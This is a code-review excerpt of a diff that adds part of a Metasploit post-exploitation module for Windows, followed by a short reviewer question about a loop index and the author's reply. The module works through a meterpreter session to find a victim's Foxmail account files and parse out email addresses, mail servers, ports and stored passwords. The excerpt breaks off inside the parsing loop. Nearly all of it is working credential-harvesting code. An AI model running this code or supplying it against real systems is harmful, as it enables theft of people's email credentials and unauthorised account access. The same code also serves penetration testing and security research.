modules/post/windows/gather/credentials/foxmail.rb

```diff
@@ -0,0 +1,217 @@
+        'References' => [
+          [ 'URL', 'https://github.com/jacobsoo/FoxmailRecovery']
+        ],
+        'Author' => [
+          'jacobsoo', # Original author of the Foxmail account decryption script.
+          'Kali-Team <kali-team[at]qq.com>' # Metasploit module
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
+    register_options(
+      [
+        OptString.new('ACCOUNT_PATH', [ false, 'The account directory path to use when grabbing account details from Foxmail']),
+      ]
+    )
+  end
+
+  def find_string(file, offset, length = 0)
+    result_string = ''
+    if length == 0
+      while (file[offset] > "\x20" && file[offset] < "\x7f")
+        result_string << file[offset]
+        offset += 1
+      end
+      return result_string
+    elsif offset && length != 0
+      return file[offset, length].unpack1('S!*') # port
+    else
+      return nil
+    end
+  end
+
+  def enum_session_file(fpath)
+    account_paths = []
+    session.fs.dir.foreach(fpath) do |mail_addr|
+      account_path = "#{fpath}\\#{mail_addr}\\Accounts\\Account"
+      account_paths.push("#{account_path}.rec0") if session.fs.file.exist?("#{account_path}.rec0")
+      account_paths.push("#{account_path}.stg") if session.fs.file.exist?("#{account_path}.stg")
+      account_paths.push("#{account_path}.tdat") if session.fs.file.exist?("#{account_path}.tdat")
+    end
+    tbl = []
+    print_status("Search account files on #{fpath}")
+
+    if account_paths.empty?
+      print_error("The path #{fpath} exists, but none of the expected session files exist in that directory!")
+      return nil
+    end
+
+    # enum session file
+    account_paths.each do |file_name|
+      begin
+        file = read_file(file_name) if session.fs.file.exist?(file_name)
+      rescue
+        print_warning("Couldn't read the contents of #{file_name}, despite the file existing. Check that you have the right permissions!")
+        next
+      end
+
+      if file.nil? || file.empty? || file[0, 4] != 'RECF'
+        next
+      end
+
+      print_good("Parsing configuration file: '#{file_name}', please wait.")
+      offset = 0
+      version = 0
+      if file[0] == "\xD0"
+        offset = 2
+      else
+        offset = 9
+        version = 1
+      end
+      index = 0
+      buffer = ''
+      email_info = {}
+      while index < file.length
+        if (file[index] && file[index] > "\x20" && file[index] < "\x7f" && file[index] != "\x3d")
+          buffer += file[index]
+          case buffer
+          when 'Email', 'IncomingServer', 'OutgoingServer', 'Password'
+            email_info[buffer] = find_string(file, index + offset) || nil
+          when 'IncomingPort', 'OutgoingPort'
+            email_info[buffer] = find_string(file, index + 5, 2) || nil
+          when 'InComingSSL', 'OutgoingSSL'
+            email_info[buffer] = find_string(file, index + 5, 2) == 1 || false
+          end
```

Comment:
Quick question but shouldn't these be updating the value of `index` accordingly?

Reply:
At the end, I added 1 to the index, and now it works well